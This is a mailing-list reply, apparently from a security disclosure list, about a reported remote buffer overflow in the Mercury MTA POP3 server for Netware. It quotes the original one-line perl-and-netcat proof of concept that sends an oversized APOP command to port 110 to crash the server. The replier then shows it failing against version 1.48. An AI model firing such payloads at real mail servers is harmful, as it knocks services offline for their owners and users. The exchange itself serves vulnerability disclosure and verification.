Przemyslaw Frasunek wrote:
> All versions of widely-used POP3 server from Mercury MTA package for Netware
> are vulnerable to remote buffer overflow allowing to crash Netware server:
>
> perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
On my copy of MercuryP/NLM 1.48 it doesn't work:
$ perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc xxx.yyy.zzz 110
+OK <[EMAIL PROTECTED]>, MercuryP/NLM v1.48 ready.
-ERR Too many failures - try again later.
$ telnet xxx.yyy.zzz 110
Trying...
Connected to xxx.yyy.zzz.
Escape character is '^]'.
+OK <[EMAIL PROTECTED]>, MercuryP/NLM v1.48 ready.
--
## Adam Osuchowski [EMAIL PROTECTED], [EMAIL PROTECTED]
## Silesian University of Technology, Computer Centre Gliwice, Poland
